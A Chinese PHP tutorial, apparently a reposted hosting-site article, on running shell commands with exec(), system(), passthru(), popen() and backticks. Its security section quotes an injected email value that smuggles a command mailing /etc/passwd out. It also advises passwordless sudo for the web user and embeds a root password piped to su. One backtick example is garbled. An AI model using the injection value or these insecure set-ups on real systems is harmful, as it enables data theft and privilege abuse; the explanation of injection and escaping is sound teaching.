您好,登錄后才能下訂單哦!
這篇文章主要講解了“PHP的exec()函數(shù)用法”,文中的講解內(nèi)容簡(jiǎn)單清晰,易于學(xué)習(xí)與理解,下面請(qǐng)大家跟著小編的思路慢慢深入,一起來(lái)研究和學(xué)習(xí)“PHP的exec()函數(shù)用法”吧!
PHP中提供了幾個(gè)調(diào)用linux命令的函數(shù),exec、system、passthru,函數(shù)使用請(qǐng)參考手冊(cè),這里不具體介紹。下面我以exec函數(shù)為例具體介紹:
比如LINUX中修改服務(wù)器時(shí)間命令是 /bin/date -s '2010-05-28 13:10',我們通過(guò)php函數(shù)exec調(diào)用這個(gè)命令執(zhí)行修改時(shí)間exec("sudo /bin/date -s '2010-05-28 13:10'",$out,$status);其中$out是輸出值,$status是返回值0或1,如果返回0則執(zhí)行成功,返回1則執(zhí)行失敗。要通過(guò)PHP成功執(zhí)行這個(gè)命令(PHP運(yùn)行用戶非root)需要檢查以下幾點(diǎn):
1、首先查看php運(yùn)行用戶,可以在web服務(wù)器配置文件中查看,或者運(yùn)行
<?php echo shell_exec("id -a");?>
直接查看。比如我的運(yùn)行用戶是www,編輯/etc/sudoers文件
vi /etc/sudoers
這表示www用戶運(yùn)行的時(shí)候不用輸入密碼。接著看圖片注釋掉前面兩個(gè),刪除圈著的環(huán)境變量LS_COLORS,其中Ubuntu中是沒(méi)有這幾個(gè)的,這一步可省略,其他Redhat、Fedora、Centos這幾個(gè)都是需要這么做的。
2、查看php.ini中配置是否打開(kāi)安全模式,主要是以下三個(gè)地方
safe_mode = (這個(gè)如果為off下面兩個(gè)就不用管了) disable_functions = safe_mode_exec_dir=
PHP作為一種服務(wù)器端的腳本語(yǔ)言,象編寫(xiě)簡(jiǎn)單,或者是復(fù)雜的動(dòng)態(tài)網(wǎng)頁(yè)這樣的任務(wù),它完全能夠勝任。但事情不總是如此,有時(shí)為了實(shí)現(xiàn)某個(gè)功能,必須借助于操作系統(tǒng)的外部程序(或者稱之為命令),這樣可以做到事半功倍。
區(qū)別:
system() 輸出并返回最后一行shell結(jié)果。
exec() 不輸出結(jié)果,返回最后一行shell結(jié)果,所有結(jié)果可以保存到一個(gè)返回的數(shù)組里面。
passthru() 只調(diào)用命令,把命令的運(yùn)行結(jié)果原樣地直接輸出到標(biāo)準(zhǔn)輸出設(shè)備上。
相同點(diǎn):
都可以獲得命令執(zhí)行的狀態(tài)碼
//system('dir'); // exec ('dir'); // passthru ('dir'); // echo `dir`;
PHP作為一種服務(wù)器端的腳本語(yǔ)言,象編寫(xiě)簡(jiǎn)單,或者是復(fù)雜的動(dòng)態(tài)網(wǎng)頁(yè)這樣的任務(wù),它完全能夠勝任。但事情不總是如此,有時(shí)為了實(shí)現(xiàn)某個(gè)功能,必須借助于操作系統(tǒng)的外部程序(或者稱之為命令),這樣可以做到事半功倍。
那么,是否可以在PHP腳本中調(diào)用外部命令呢?如果能,如何去做呢?有些什么方面的顧慮呢?相信你看了本文后,肯定能夠回答這些問(wèn)題了。是否可以?
答案是肯定的。PHP和其它的程序設(shè)計(jì)語(yǔ)言一樣,完全可以在程序內(nèi)調(diào)用外部命令,并且是很簡(jiǎn)單的:只要用一個(gè)或幾個(gè)函數(shù)即可。
前提條件
由于PHP基本是用于WEB程序開(kāi)發(fā)的,所以安全性成了人們考慮的一個(gè)重要方面。于是PHP的設(shè)計(jì)者們給PHP加了一個(gè)門(mén):安全模式。如果運(yùn)行在安全模式下,那么PHP腳本中將受到如下四個(gè)方面的限制:
執(zhí)行外部命令
在打開(kāi)文件時(shí)有些限制
連接MySQL數(shù)據(jù)庫(kù)
基于HTTP的認(rèn)證
在 安全模式下,只有在特定目錄中的外部程序才可以被執(zhí)行,對(duì)其它程序的調(diào)用將被拒絕。這個(gè)目錄可以在php.ini
文件中用safe_mode_exec_dir
指令,或在編譯PHP是加上--with-exec-dir
選項(xiàng)來(lái)指定,默認(rèn)是 /usr/local/php/bin。
如果你調(diào)用一個(gè)應(yīng)該可以輸出結(jié)果的外部命令(意思是PHP腳本沒(méi)有錯(cuò)誤),得到的卻是一片空白,那么很可能你的網(wǎng)管已經(jīng)把PHP運(yùn)行在安全模式下了。
如何做?
在PHP中調(diào)用外部命令,可以用如下三種方法來(lái)實(shí)現(xiàn):
1) 用PHP提供的專門(mén)函數(shù)
PHP提供共了3個(gè)專門(mén)的執(zhí)行外部命令的函數(shù):system(),exec(),passthru()。
system()
原型:string system (string command [, int return_var])
system()函數(shù)很其它語(yǔ)言中的差不多,它執(zhí)行給定的命令,輸出和返回結(jié)果。第二個(gè)參數(shù)是可選的,用來(lái)得到命令執(zhí)行后的狀態(tài)碼。
例子:
<?php system("/usr/local/bin/webalizer/webalizer"); ?> exec()
原型:string exec (string command [, string array [, int return_var]])
exec ()函數(shù)與system()類似,也執(zhí)行給定的命令,但不輸出結(jié)果,而是返回結(jié)果的最后一行。雖然它只返回命令結(jié)果的最后一行,但用第二個(gè)參數(shù)array 可以得到完整的結(jié)果,方法是把結(jié)果逐行追加到array的結(jié)尾處。所以如果array不是空的,在調(diào)用之前最好用unset()最它清掉。只有指定了第二 個(gè)參數(shù)時(shí),才可以用第三個(gè)參數(shù),用來(lái)取得命令執(zhí)行的狀態(tài)碼。
例子:
<?php exec("/bin/ls -l"); exec("/bin/ls -l", $res); exec("/bin/ls -l", $res, $rc); ?> passthru()
原型:void passthru (string command [, int return_var])
passthru ()只調(diào)用命令,不返回任何結(jié)果,但把命令的運(yùn)行結(jié)果原樣地直接輸出到標(biāo)準(zhǔn)輸出設(shè)備上。所以passthru()函數(shù)經(jīng)常用來(lái)調(diào)用象pbmplus (Unix下的一個(gè)處理圖片的工具,輸出二進(jìn)制的原始圖片的流)這樣的程序。同樣它也可以得到命令執(zhí)行的狀態(tài)碼。
例子:
<?php header("Content-type: image/gif"); passthru("./ppmtogif hunte.ppm"); ?>
2) 用popen()函數(shù)打開(kāi)進(jìn)程
上面的方法只能簡(jiǎn)單地執(zhí)行命令,卻不能與命令交互。但有些時(shí)候必須向命令輸入一些東西,如在增加Linux的系統(tǒng)用戶時(shí),要調(diào)用su來(lái)把當(dāng)前用戶換到root才行,而su命令必須要在命令行上輸入root的密碼。這種情況下,用上面提到的方法顯然是不行的。
popen ()函數(shù)打開(kāi)一個(gè)進(jìn)程管道來(lái)執(zhí)行給定的命令,返回一個(gè)文件句柄。既然返回的是一個(gè)文件句柄,那么就可以對(duì)它讀和寫(xiě)了。在PHP3中,對(duì)這種句柄只能做單一 的操作模式,要么寫(xiě),要么讀;從PHP4開(kāi)始,可以同時(shí)讀和寫(xiě)了。除非這個(gè)句柄是以一種模式(讀或?qū)懀┐蜷_(kāi)的,否則必須調(diào)用pclose()函數(shù)來(lái)關(guān)閉 它。
例子1:
<?php $fp=popen("/bin/ls -l", "r"); ?>
例子2:
<?php /* PHP中如何增加一個(gè)系統(tǒng)用戶 下面是一段例程,增加一個(gè)名字為james的用戶, root密碼是 verygood。僅供參考 */ $sucommand = "su --login root --command"; $useradd = "useradd "; $rootpasswd = "verygood"; $user = "james"; $user_add = sprintf("%s "%s %s"",$sucommand,$useradd,$user); $fp = @popen($user_add,"w"); @fputs($fp,$rootpasswd); @pclose($fp); ?>
3) 用反撇號(hào)(`,也就是鍵盤(pán)上ESC鍵下面的那個(gè),和~在同一個(gè)上面)
這個(gè)方法以前沒(méi)有歸入PHP的文檔,是作為一個(gè)秘技存在的。方法很簡(jiǎn)單,用兩個(gè)反撇號(hào)把要執(zhí)行的命令括起來(lái)作為一個(gè)表達(dá)式,這個(gè)表達(dá)式的值就是命令執(zhí)行的結(jié)果。如:
<?php $res='/bin/ls -l'; echo ' '.$res.' '; ?>
這個(gè)腳本的輸出就象:
hunte.gif
hunte.ppm
jpg.htm
jpg.jpg
passthru.php
要考慮些什么?
要考慮兩個(gè)問(wèn)題:安全性和超時(shí)。
先看安全性。比如,你有一家小型的網(wǎng)上商店,所以可以出售的產(chǎn)品列表放在一個(gè)文件中。你編寫(xiě)了一個(gè)有表單的HTML文件,讓你的用戶輸入他們的EMAIL地 址,然后把這個(gè)產(chǎn)品列表發(fā)給他們。假設(shè)你沒(méi)有使用PHP的mail()函數(shù)(或者從未聽(tīng)說(shuō)過(guò)),你就調(diào)用Linux/Unix系統(tǒng)的mail程序來(lái)發(fā)送這 個(gè)文件。程序就象這樣:
<?php system("mail $to < products.txt"); echo "我們的產(chǎn)品目錄已經(jīng)發(fā)送到你的信箱:$to"; ?>
用這段代碼,一般的用戶不會(huì)產(chǎn)生什么危險(xiǎn),但實(shí)際上存在著非常大的安全漏洞。如果有個(gè)惡意的用戶輸入了這樣一個(gè)EMAIL地址:
'--bla ; mail someone@domain.com < /etc/passwd ;'
那么這條命令最終變成:
'mail --bla ; mail someone@domain.com < /etc/passwd ; < products.txt'
我相信,無(wú)論哪個(gè)網(wǎng)絡(luò)管理人員見(jiàn)到這樣的命令,都會(huì)嚇出一身冷汗來(lái)。
幸好,PHP為我們提供了兩個(gè)函數(shù):EscapeShellCmd()和EscapeShellArg()。函數(shù)EscapeShellCmd把一個(gè)字符串 中所有可能瞞過(guò)Shell而去執(zhí)行另外一個(gè)命令的字符轉(zhuǎn)義。這些字符在Shell中是有特殊含義的,象分號(hào)(),重定向(>)和從文件讀入 (<)等。函數(shù)EscapeShellArg是用來(lái)處理命令的參數(shù)的。它在給定的字符串兩邊加上單引號(hào),并把字符串中的單引號(hào)轉(zhuǎn)義,這樣這個(gè)字符串 就可以安全地作為命令的參數(shù)。
再來(lái)看看超時(shí)問(wèn)題。如果要執(zhí)行的命令要花費(fèi)很長(zhǎng)的時(shí)間,那么應(yīng)該把這個(gè)命令放到系統(tǒng)的后臺(tái)去運(yùn) 行。但在默認(rèn)情況下,象system()等函數(shù)要等到這個(gè)命令運(yùn)行完才返回(實(shí)際上是要等命令的輸出結(jié)果),這肯定會(huì)引起PHP腳本的超時(shí)。解決的辦法是 把命令的輸出重定向到另外一個(gè)文件或流中,如:
<?php system("/usr/local/bin/order_proc > /tmp/null &"); ?>
感謝各位的閱讀,以上就是“PHP的exec()函數(shù)用法”的內(nèi)容了,經(jīng)過(guò)本文的學(xué)習(xí)后,相信大家對(duì)PHP的exec()函數(shù)用法這一問(wèn)題有了更深刻的體會(huì),具體使用情況還需要大家實(shí)踐驗(yàn)證。這里是億速云,小編將為大家推送更多相關(guān)知識(shí)點(diǎn)的文章,歡迎關(guān)注!
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。